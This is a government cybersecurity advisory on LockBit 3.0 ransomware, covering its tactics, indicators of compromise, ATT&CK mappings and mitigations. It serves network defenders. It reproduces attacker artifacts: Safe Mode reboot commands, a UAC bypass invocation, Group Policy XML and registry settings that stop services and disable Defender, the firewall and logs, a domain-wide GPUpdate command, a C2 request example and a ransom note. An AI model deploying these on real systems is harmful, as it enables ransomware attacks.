CISA Cybersecurity Advisories

#StopRansomware: LockBit 3.0

CISA — Wed, 15 Mar 2023 15:20:17 EDT

SUMMARY

Note: this joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

Actions to take today to mitigate cyber threats from ransomware:

Prioritize remediating known exploited vulnerabilities.
Train users to recognize and report phishing attempts.
Enable and enforce phishing- resistant multifactor authentication.

The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing & Analysis Center (MS-ISAC) are releasing this joint CSA to disseminate known LockBit 3.0 ransomware IOCs and TTPs identified through FBI investigations as recently as March 2023.

The LockBit 3.0 ransomware operations function as a Ransomware-as-a-Service (RaaS) model and is a continuation of previous versions of the ransomware, LockBit 2.0, and LockBit. Since January 2020, LockBit has functioned as an affiliate-based ransomware variant; affiliates deploying the LockBit RaaS use many varying TTPs and attack a wide range of businesses and critical infrastructure organizations, which can make effective computer network defense and mitigation challenging.

The FBI, CISA, and the MS-ISAC encourage organizations to implement the recommendations in the mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.

Download the PDF version of this report:

#StopRansomware: Lockbit (PDF, 688.70 KB )

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 12. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK for Enterprise.

CAPABILITIES

LockBit 3.0, also known as “LockBit Black,” is more modular and evasive than its previous versions and shares similarities with Blackmatter and Blackcat ransomware.

LockBit 3.0 is configured upon compilation with many different options that determine the behavior of the ransomware. Upon the actual execution of the ransomware within a victim environment, various arguments can be supplied to further modify the behavior of the ransomware. For example, LockBit 3.0 accepts additional arguments for specific operations in lateral movement and rebooting into Safe Mode (see LockBit Command Line parameters under Indicators of Compromise). If a LockBit affiliate does not have access to passwordless LockBit 3.0 ransomware, then a password argument is mandatory during the execution of the ransomware. LockBit 3.0 affiliates failing to enter the correct password will be unable to execute the ransomware [T1480.001]. The password is a cryptographic key which decodes the LockBit 3.0 executable. By protecting the code in such a manner, LockBit 3.0 hinders malware detection and analysis with the code being unexecutable and unreadable in its encrypted form. Signature-based detections may fail to detect the LockBit 3.0 executable as the executable’s encrypted potion will vary based on the cryptographic key used for encryption while also generating a unique hash. When provided the correct password, LockBit 3.0 will decrypt the main component, continue to decrypt or decompress its code, and execute the ransomware.

LockBit 3.0 will only infect machines that do not have language settings matching a defined exclusion list. However, whether a system language is checked at runtime is determined by a configuration flag originally set at compilation time. Languages on the exclusion list include, but are not limited to, Romanian (Moldova), Arabic (Syria), and Tatar (Russia). If a language from the exclusion list is detected [T1614.001], LockBit 3.0 will stop execution without infecting the system.

INITIAL ACCESS

Affiliates deploying LockBit 3.0 ransomware gain initial access to victim networks via remote desktop protocol (RDP) exploitation [T1133], drive-by compromise [T1189], phishing campaigns [T1566], abuse of valid accounts [T1078], and exploitation of public-facing applications [T1190].

EXECUTION AND INFECTION PROCESS

During the malware routine, if privileges are not sufficient, LockBit 3.0 attempts to escalate to the required privileges [TA0004]. LockBit 3.0 performs functions such as:

Enumerating system information such as hostname, host configuration, domain information, local drive configuration, remote shares, and mounted external storage devices [T1082]
Terminating processes and services [T1489]
Launching commands [TA0002]
Enabling automatic logon for persistence and privilege escalation [T1547]
Deleting log files, files in the recycle bin folder, and shadow copies residing on disk [T1485], [T1490]

LockBit 3.0 attempts to spread across a victim network by using a preconfigured list of credentials hardcoded at compilation time or a compromised local account with elevated privileges [T1078]. When compiled, LockBit 3.0 may also enable options for spreading via Group Policy Objects and PsExec using the Server Message Block (SMB) protocol. LockBit 3.0 attempts to encrypt [T1486] data saved to any local or remote device, but skips files associated with core system functions.

After files are encrypted, LockBit 3.0 drops a ransom note with the new filename <Ransomware ID>.README.txt and changes the host’s wallpaper and icons to LockBit 3.0 branding [T1491.001]. If needed, LockBit 3.0 will send encrypted host and bot information to a command and control (C2) server [T1027].

Once completed, LockBit 3.0 may delete itself from the disk [T1070.004] as well as any Group Policy updates that were made, depending on which options were set at compilation time.

EXFILTRATION

LockBit 3.0 affiliates use Stealbit, a custom exfiltration tool used previously with LockBit 2.0 [TA0010]; rclone, an open-source command line cloud storage manager [T1567.002]; and publicly available file sharing services, such as MEGA [T1567.002], to exfiltrate sensitive company data files prior to encryption. While rclone and many publicly available file sharing services are primarily used for legitimate purposes, they can also be used by threat actors to aid in system compromise, network exploration, or data exfiltration. LockBit 3.0 affiliates often use other publicly available file sharing services to exfiltrate data as well [T1567] (see Table 1).

***Table 1: Anonymous File Sharing Sites Used to Exfiltrate Data Before System Encryption***
File Sharing Site
https://www.premiumize[.]com
https://anonfiles[.]com
https://www.sendspace[.]com
https://fex[.]net
https://transfer[.]sh
https://send.exploit[.]in

LEVERAGING FREEWARE AND OPEN-SOURCE TOOLS

LockBit affiliates have been observed using various freeware and open-source tools during their intrusions. These tools are used for a range of activities such as network reconnaissance, remote access and tunneling, credential dumping, and file exfiltration. Use of PowerShell and Batch scripts
are observed across most intrusions, which focus on system discovery, reconnaissance, password/credential hunting, and privilege escalation. Artifacts of professional penetration-testing tools such as Metasploit and Cobalt Strike have also been observed. See Table 2 for a list of legitimate freeware and open-source tools LockBit affiliates have repurposed for ransomware operations:

*Table 2: Freeware and Open-Source Tools Used by LockBit 3.0 Affiliates*
Tool	Description	MITRE ATT&CK ID
Chocolatey	Command-line package manager for Windows.	T1072
FileZilla	Cross-platform File Transfer Protocol (FTP) application.	T1071.002
Impacket	Collection of Python classes for working with network protocols.	S0357
MEGA Ltd MegaSync	Cloud-based synchronization tool.	T1567.002
Microsoft Sysinternals ProcDump	Generates crash dumps. Commonly used to dump the contents of Local Security Authority Subsystem Service, LSASS.exe.	T1003.001
Microsoft Sysinternals PsExec	Execute a command-line process on a remote machine.	S0029
Mimikatz	Extracts credentials from system.	S0002
Ngrok	Legitimate remote-access tool abused to bypass victim network protections.	S0508
PuTTY Link (Plink)	Can be used to automate Secure Shell (SSH) actions on Windows.	T1572
Rclone	Command-line program to manage cloud storage files	S1040
SoftPerfect Network Scanner	Performs network scans.	T1046
Splashtop	Remote-desktop software.	T1021.001
WinSCP	SSH File Transfer Protocol client for Windows.	T1048

Indicators of Compromise (IOCs)

The IOCs and malware characteristics outlined below were derived from field analysis. The following samples are current as of March 2023.

LockBit 3.0 Black Icon

LockBit 3.0 Wallpaper

LockBit Command Line Parameters

LockBit Parameters	Description
-del	Self-delete.
-gdel	Remove LockBit 3.0 group policy changes.
-gspd	Spread laterally via group policy.
-pass (32 character value)	(Required) Password used to launch LockBit 3.0.
-path (File or path)	Only encrypts provided file or folder.
-psex	Spread laterally via admin shares.
-safe	Reboot host into Safe Mode.
-wall	Sets LockBit 3.0 Wallpaper and prints out LockBit 3.0 ransom note.

Mutual Exclusion Object (Mutex) Created

When executed, LockBit 3.0 will create the mutex, Global\<MD4 hash of machine GUID>,
and check to see if this mutex has already been created to avoid running more than one instance of the ransomware.

UAC Bypass via Elevated COM Interface

LockBit 3.0 is capable of bypassing User Account Control (UAC) to execute code with elevated privileges via elevated Component Object Model (COM) Interface. C:\Windows\System32\dllhost.exe is spawned with high integrity with the command line GUID 3E5FC7F9-9A51-4367-9063-A120244FBEC.

For example, %SYSTEM32%\dllhost.exe/Processid:{3E5FC7F9-9A51-4367-9063- A120244FBEC7}.

Volume Shadow Copy Deletion

LockBit 3.0 uses Windows Management Instrumentation (WMI) to identify and delete Volume Shadow Copies. LockBit 3.0 uses select * from Win32_ShadowCopy to query for Volume Shadow copies, Win32_ShadowCopy.ID to obtain the ID of the shadow copy, and DeleteInstance to delete any shadow copies.

Registry Artifacts

LockBit 3.0 Icon

Registry Key	Value	Data
HKCR\. <Malware Extension>	(Default)	<Malware Extension>
HKCR\<Malware Extension>\DefaultIcon	(Default)	C:\ProgramData\<Mal ware Extension>.ico

LockBit 3.0 Wallpaper

Registry Key	Value	Data
HKCU\Control Panel\Desktop\WallPaper	(Default)	C:\ProgramData\<Mal ware Extension>.bmp

Disable Privacy Settings Experience

Registry Key	Value	Data
SOFTWARE\Policies\Microsoft\Win dows\OOBE	DisablePrivacyE xperience	0

Enable Automatic Logon

Registry Key	Value	Data
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon	AutoAdminLogon	1
	DefaultUserName	<username>
	DefaultDomainNa me	<domain name>
	DefaultPassword	<password>

Disable and Clear Windows Event Logs

Registry Key	Value	Data
HKLM\SOFTWARE\Microsoft\Windows \CurrentVersion\WINEVT\Channels \*	Enabled	0
HKLM\SOFTWARE\Microsoft\Windows \CurrentVersion\WINEVT\Channels \* \ChannelAccess	ChannelAccess	AO:BAG:SYD:(A;;0x1;; ;SY)(A;;0x5;;;BA)(A; ;0x1;;;LA)

Registry Key

Value

Data

HKLM\SOFTWARE\Microsoft\Windows
\CurrentVersion\WINEVT\Channels
\*

Enabled

HKLM\SOFTWARE\Microsoft\Windows
\CurrentVersion\WINEVT\Channels
\* \ChannelAccess

ChannelAccess

AO:BAG:SYD:(A;;0x1;;
;SY)(A;;0x5;;;BA)(A;
;0x1;;;LA)

Ransom Locations

LockBit 3.0 File Path Locations
ADMIN$\Temp\<LockBit3.0 Filename>.exe
%SystemRoot%\Temp\<LockBit3.0 Filename>.exe
\<Domain Name>\sysvol\<Domain Name>\scripts\<Lockbit 3.0 Filename>.exe (Domain Controller)

Safe Mode Launch Commands

LockBit 3.0 has a Safe Mode feature to circumvent endpoint antivirus and detection. Depending upon the host operating system, the following command is launched to reboot the system to Safe Mode with Networking:

Operating System	Safe Mode with Networking command
Vista and newer	bcdedit /set {current} safeboot network
Pre-Vista	bootcfg /raw /a /safeboot:network /id 1

Operating System	Disable Safe mode reboot
Vista and newer	bcdedit /deletevalue {current} safeboot
Pre-Vista	bootcfg /raw /fastdetect /id 1

Group Policy Artifacts

The following are Group Policy Extensible Markup Language (XML) files identified after a LockBit 3.0 infection:

NetworkShares.xml
<?xml version="1.0" encoding="utf-8"?> <NetworkShareSettings clsid="{520870D8-A6E7-47e8-A8D8-E6A4E76EAEC2}"> <NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_D" changed="%s" uid="%s"> <Properties action="U" name="%%ComputerName%%_D" path="D:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/>

Services.xml stops and disables services on the Active Directory (AD) hosts.

Services.xml
<?xml version="1.0" encoding="utf-8"?> <NTServices clsid="{2CFB484A-4E96-4b5d-A0B6-093D2F91E6AE}"> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQLPBDMS" image="4" changed="%s" uid="%s" disabled="0"> <Properties startupType="DISABLED" serviceName="SQLPBDMS" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQLPBENGINE" image="4" changed="%s" uid="%s" disabled="0"> <Properties startupType="DISABLED" serviceName="SQLPBENGINE" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="MSSQLFDLauncher" image="4" changed="%s" uid="%s" userContext="0" removePolicy="0" disabled="0"> <Properties startupType="DISABLED" serviceName="MSSQLFDLauncher" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQLSERVERAGENT" image="4" changed="%s" uid="%s" disabled="0"> <Properties startupType="DISABLED" serviceName="SQLSERVERAGENT" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="MSSQLServerOLAPService" image="4" changed="%s" uid="%s" disabled="0"> <Properties startupType="DISABLED" serviceName="MSSQLServerOLAPService" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SSASTELEMETRY" image="4" changed="%s" uid="%s" disabled="0"> <Properties startupType="DISABLED" serviceName="SSASTELEMETRY" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQLBrowser" image="4" changed="%s" uid="%s" disabled="0"> <Properties startupType="DISABLED" serviceName="SQLBrowser" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQL Server Distributed Replay Client" image="4" changed="%s" uid="%s" disabled="0"> <Properties startupType="DISABLED" serviceName="SQL Server Distributed Replay Client" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQL Server Distributed Replay Controller" image="4" changed="%s" uid="%s" disabled="0"> <Properties startupType="DISABLED" serviceName="SQL Server Distributed Replay Controller" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="MsDtsServer150" image="4" changed="%s" uid="%s" disabled="0"> <Properties startupType="DISABLED" serviceName="MsDtsServer150" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SSISTELEMETRY150" image="4" changed="%s" uid="%s" disabled="0"> <Properties startupType="DISABLED" serviceName="SSISTELEMETRY150" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SSISScaleOutMaster150" image="4" changed="%s" uid="%s" disabled="0"> <Properties startupType="DISABLED" serviceName="SSISScaleOutMaster150" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SSISScaleOutWorker150" image="4" changed="%s" uid="%s" disabled="0"> <Properties startupType="DISABLED" serviceName="SSISScaleOutWorker150" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="MSSQLLaunchpad" image="4" changed="%s" uid="%s" disabled="0"> <Properties startupType="DISABLED" serviceName="MSSQLLaunchpad" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQLWriter" image="4" changed="%s" uid="%s" disabled="0"> <Properties startupType="DISABLED" serviceName="SQLWriter" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQLTELEMETRY" image="4" changed="%s" uid="%s" disabled="0"> <Properties startupType="DISABLED" serviceName="SQLTELEMETRY" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="MSSQLSERVER" image="4" changed="%s" uid="%s" disabled="0"> <Properties startupType="DISABLED" serviceName="MSSQLSERVER" serviceAction="STOP" timeout="60"/> </NTService> </NTServices>

Services.xml

<?xml version="1.0" encoding="utf-8"?>
<NTServices clsid="{2CFB484A-4E96-4b5d-A0B6-093D2F91E6AE}">
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="SQLPBDMS" image="4" changed="%s" uid="%s" disabled="0">
<Properties startupType="DISABLED" serviceName="SQLPBDMS" serviceAction="STOP" timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="SQLPBENGINE" image="4" changed="%s" uid="%s" disabled="0">
<Properties startupType="DISABLED" serviceName="SQLPBENGINE" serviceAction="STOP" timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="MSSQLFDLauncher" image="4" changed="%s" uid="%s" userContext="0" removePolicy="0" disabled="0">
<Properties startupType="DISABLED" serviceName="MSSQLFDLauncher" serviceAction="STOP" timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="SQLSERVERAGENT" image="4" changed="%s" uid="%s" disabled="0">
<Properties startupType="DISABLED" serviceName="SQLSERVERAGENT" serviceAction="STOP" timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="MSSQLServerOLAPService" image="4" changed="%s" uid="%s" disabled="0">
<Properties startupType="DISABLED" serviceName="MSSQLServerOLAPService" serviceAction="STOP" timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="SSASTELEMETRY" image="4" changed="%s" uid="%s" disabled="0">
<Properties startupType="DISABLED" serviceName="SSASTELEMETRY" serviceAction="STOP" timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="SQLBrowser" image="4" changed="%s" uid="%s" disabled="0">
<Properties startupType="DISABLED" serviceName="SQLBrowser" serviceAction="STOP" timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="SQL Server Distributed Replay Client" image="4" changed="%s" uid="%s" disabled="0">
<Properties startupType="DISABLED" serviceName="SQL Server Distributed Replay Client" serviceAction="STOP" timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="SQL Server Distributed Replay Controller" image="4" changed="%s" uid="%s" disabled="0">
<Properties startupType="DISABLED" serviceName="SQL Server Distributed Replay Controller" serviceAction="STOP" timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="MsDtsServer150" image="4" changed="%s" uid="%s" disabled="0">
<Properties startupType="DISABLED" serviceName="MsDtsServer150" serviceAction="STOP" timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="SSISTELEMETRY150" image="4" changed="%s" uid="%s" disabled="0">
<Properties startupType="DISABLED" serviceName="SSISTELEMETRY150" serviceAction="STOP" timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="SSISScaleOutMaster150" image="4" changed="%s" uid="%s" disabled="0">
<Properties startupType="DISABLED" serviceName="SSISScaleOutMaster150" serviceAction="STOP" timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="SSISScaleOutWorker150" image="4" changed="%s" uid="%s" disabled="0">
<Properties startupType="DISABLED" serviceName="SSISScaleOutWorker150" serviceAction="STOP" timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="MSSQLLaunchpad" image="4" changed="%s" uid="%s" disabled="0">
<Properties startupType="DISABLED" serviceName="MSSQLLaunchpad" serviceAction="STOP" timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="SQLWriter" image="4" changed="%s" uid="%s" disabled="0">
<Properties startupType="DISABLED" serviceName="SQLWriter" serviceAction="STOP" timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="SQLTELEMETRY" image="4" changed="%s" uid="%s" disabled="0">
<Properties startupType="DISABLED" serviceName="SQLTELEMETRY" serviceAction="STOP" timeout="30"/>
</NTService>
<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}"
name="MSSQLSERVER" image="4" changed="%s" uid="%s" disabled="0">
<Properties startupType="DISABLED" serviceName="MSSQLSERVER" serviceAction="STOP" timeout="60"/>
</NTService>
</NTServices>

Registry.pol

The following registry configuration changes values for the Group Policy refresh time, disable SmartScreen, and disable Windows Defender.

Registry Key	Registry Value	Value type	Data
HKLM\SOFTWARE\Policies\Microsoft\Window s\System	GroupPolicyRefresh TimeDC	REG_D WORD	1
HKLM\SOFTWARE\Policies\Microsoft\Window s\System	GroupPolicyRefresh TimeOffsetDC	REG_D WORD	1
HKLM\SOFTWARE\Policies\Microsoft\Window s\System	GroupPolicyRefresh Time	REG_D WORD	1
HKLM\SOFTWARE\Policies\Microsoft\Window s\System	GroupPolicyRefresh TimeOffset	REG_D WORD	1
HKLM\SOFTWARE\Policies\Microsoft\Window s\System	EnableSmartScreen	REG_D WORD	0
HKLM\SOFTWARE\Policies\Microsoft\Window s\System	**del.ShellSmartSc reenLevel	REG_S Z
HKLM\SOFTWARE\Policies\Microsoft\Window s Defender	DisableAntiSpyware	REG_D WORD	1
HKLM\SOFTWARE\Policies\Microsoft\Window s Defender	DisableRoutinelyTa kingAction	REG_D WORD	1
HKLM\SOFTWARE\Policies\Microsoft\Window s Defender\Real-Time Protection	DisableRealtimeMon itoring	REG_D WORD	1
HKLM\SOFTWARE\Policies\Microsoft\Window s Defender\Real-Time Protection	DisableBehaviorMon itoring	REG_D WORD	1
HKLM\SOFTWARE\Policies\Microsoft\Window s Defender\Spynet	SubmitSamplesConse nt	REG_D WORD	2
HKLM\SOFTWARE\Policies\Microsoft\Window s Defender\Spynet	SpynetReporting	REG_D WORD	0
HKLM\SOFTWARE\Policies\Microsoft\Window sFirewall\DomainProfile	EnableFirewall	REG_D WORD	0
HKLM\SOFTWARE\Policies\Microsoft\Window sFirewall\StandardProfile	EnableFirewall	REG_D WORD	0

Force GPUpdate

Once new group policies are added, a PowerShell command using Group Policy update (GPUpdate) applies the new group policy changes to all computers on the AD domain.

Force GPUpdate Powershell Command
powershell Get-ADComputer -filter * -Searchbase '%s' \| Foreach-Object { Invoke- GPUpdate -computer $_.name -force -RandomDelayInMinutes 0}

Services Killed

vss	sql	svc$
memtas	mepocs	msexchange
sophos	veeam	backup
GxVss	GxBlr	GxFWD
GxCVD	GxCIMgr

Processes Killed

sql	oracle	ocssd
dbsnmp	synctime	agntsvc
isqlplussvc	xfssvccon	mydesktopservice
ocautoupds	encsvc	firefox
tbirdconfig	mydesktopqos	ocomm
dbeng50	sqbcoreservice	excel
infopath	msaccess	mspu
onenote	outlook	powerpnt
steam	thebat	thunderbird
visio	winword	wordpad
notepad

LockBit 3.0 Ransom Note

~~~ LockBit 3.0 the world's fastest and most stable ransomware from 2019~~~
>>>>> Your data is stolen and encrypted.
If you don't pay the ransom, the data will be published on our TOR darknet sites. Keep in mind that once your data appears on our leak site, it could be bought by your competitors at any second, so don't hesitate for a long time. The sooner you pay the ransom, the sooner your company will be safe.

Network Connections

If configured, Lockbit 3.0 will send two HTTP POST requests to one of the C2servers. Information about the victim host and bot are encrypted with an Advanced Encryption Standard (AES) key and encoded in Base64.

Example of HTTP POST request
POST <Lockbit C2>/?7F6Da=u5a0TdP0&Aojq=&NtN1W=OuoaovMvrVJSmPNaA5&fckp9=FCYyT6b7kdyeEXywS8I8 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br Content-Type: text/plain
User-Agent: Safari/537.36 <Lockbit User Agent String>
Host: <Lockbit C2>
Connection: Keep-Alive LIWy=RJ51lB5GM&a4OuN=<Lockbit
ID>&LoSyE3=8SZ1hdlhzld4&DHnd99T=rTx9xGlInO6X0zWW&2D6=Bokz&T1guL=MtRZsFCRMKyBmfmqI& 6SF3g=JPDt9lfJIQ&wQadZP=<Base64 encrypted data> Xni=AboZOXwUw&2rQnM4=94L&0b=ZfKv7c&NO1d=M2kJlyus&AgbDTb=xwSpba&8sr=EndL4n0HVZjxPR& m4ZhTTH=sBVnPY&xZDiygN=cU1pAwKEztU&=5q55aFIAfTVQWTEm&4sXwVWcyhy=l68FrIdBESIvfCkvYl
Example of information found in encrypted data
{
"bot_version":"X",
"bot_id":"X",
"bot_company":"X", "host_hostname":"X", "host_user":"X",
"host_os":"X",
"host_domain":"X",
"host_arch":"X",
"host_lang":"X", "disks_info":[
{
"disk_name":"X",
"disk_size":"XXXX", "free_size":"XXXXX"
}

User Agent Strings

Mozilla/5.0 (Windows NT 6.1)	AppleWebKit/587.38 (KHTML, like Gecko)	Chrome/91.0.4472.77
Safari/537.36	Edge/91.0.864.37	Firefox/89.0
Gecko/20100101

MITRE ATT&CK TECHNIQUES

See Table 3 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping to the MITRE ATT&CK framework, see CISA’s Decider Tool and Best Practices for MITRE ATT&CK Mapping Guide.

*Table 3: LockBit 3.0 Actors ATT&CK Techniques for Enterprise*
Initial Access
Technique Title	ID	Use
Valid Accounts	T1078	LockBit 3.0 actors obtain and abuse credentials of existing accounts as a means of gaining initial access.
Exploit External Remote Services	T1133	LockBit 3.0 actors exploit RDP to gain access to victim networks.
Drive-by Compromise	T1189	LockBit 3.0 actors gain access to a system through a user visiting a website over the normal course of browsing.
Exploit Public-Facing Application	T1190	LockBit 3.0 actors exploit vulnerabilities in internet-facing systems to gain access to victims’ systems.
Phishing	T1566	LockBit 3.0 actors use phishing and spearphishing to gain access to victims' networks.
Execution
Technique Title	ID	Use
Execution	TA0002	LockBit 3.0 launches commands during its execution.
Software Deployment Tools	T1072	LockBit 3.0 uses Chocolatey, a command- line package manager for Windows.
Persistence
Technique Title	ID	Use
Valid Accounts	T1078	LockBit 3.0 uses a compromised user account to maintain persistence on the target network.
Boot or Logo Autostart Execution	T1547	LockBit 3.0 enables automatic logon for persistence.
Privilege Escalation
Technique Title	ID	Use
Privilege Escalation	TA0004	Lockbit 3.0 will attempt to escalate to the required privileges if current account privileges are insufficient.
Boot or Logo Autostart Execution	T1547	LockBit 3.0 enables automatic logon for privilege escalation.
Defense Evasion
Technique Title	ID	Use
Obfuscated Files or Information	T1027	LockBit 3.0 will send encrypted host and bot information to its C2 servers.
Indicator Removal: File Deletion	T1070.004	LockBit 3.0 will delete itself from the disk.
Execution Guardrails: Environmental Keying	T1480.001	LockBit 3.0 will only decrypt the main component or continue to decrypt and/or decompress data if the correct password is entered.
Credential Access
Technique Title	ID	Use
OS Credential Dumping: LSASS Memory	T1003.001	LockBit 3.0 uses Microsoft Sysinternals ProDump to dump the contents of LSASS.exe.
Discovery
Technique Title	ID	Use
Network Service Discovery	T1046	LockBit 3.0 uses SoftPerfect Network Scanner to scan target networks.
System Information Discovery	T1082	LockBit 3.0 will enumerate system information to include hostname, host configuration, domain information, local drive configuration, remote shares, and mounted external storage devices.
System Location Discovery: System Language Discovery	T1614.001	LockBit 3.0 will not infect machines with language settings that match a defined exclusion list.
Lateral Movement
Technique Title	ID	Use
Remote Services: Remote Desktop Protocol	T1021.001	LockBit 3.0 uses Splashtop remote- desktop software to facilitate lateral movement.
Command and Control
Technique Title	ID	Use
Application Layer Protocol: File Transfer Protocols	T1071.002	LockBit 3.0 uses FileZilla for C2.
Protocol Tunnel	T1572	LockBit 3.0 uses Plink to automate SSH actions on Windows.
Exfiltration
Technique Title	ID	Use
Exfiltration	TA0010	LockBit 3.0 uses Stealbit, a custom exfiltration tool first used with LockBit 2.0, to steal data from a target network.
Exfiltration Over Web Service	T1567	LockBit 3.0 uses publicly available file sharing services to exfiltrate a target’s data.
Exfiltration Over Web Service: Exfiltration to Cloud Storage	T1567.002	LockBit 3.0 actors use (1) rclone, an open source command line cloud storage manager to exfiltrate and (2) MEGA, a publicly available file sharing service for data exfiltration.
Impact
Technique Title	ID	Use
Data Destruction	T1485	LockBit 3.0 deletes log files and empties the recycle bin.
Data Encrypted for Impact	T1486	LockBit 3.0 encrypts data on target systems to interrupt availability to system and network resources.
Service Stop	T1489	LockBit 3.0 terminates processes and services.
Inhibit System Recovery	T1490	LockBit 3.0 deletes volume shadow copies residing on disk.
Defacement: Internal Defacement	T1491.001	LockBit 3.0 changes the host system’s wallpaper and icons to the LockBit 3.0 wallpaper and icons, respectively.

MITIGATIONS

The FBI, CISA, and the MS-ISAC recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture on the basis of LockBit 3.0’s activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful TTPs. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers [CPG 7.3] in a physically separate, segmented, and secure location (e.g., hard drive, storage device, the cloud).
Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with National Institute for Standards and Technology (NIST) standards for developing and managing password policies [CPG 3.4].
- Use longer passwords consisting of at least 8 characters and no more than 64 characters in length [CPG 1.4]
- Store passwords in hashed format using industry-recognized password managers
- Add password user “salts” to shared login credentials
- Avoid reusing passwords
- Implement multiple failed login attempt account lockouts [CPG 1.1]
- Disable password “hints”
- Refrain from requiring password changes more frequently than once per year. Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher.
- Require administrator credentials to install software
Require phishing-resistant multifactor authentication [CPG 1.3] for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems.
Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats.
Segment networks [CPG 8.1] to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement.
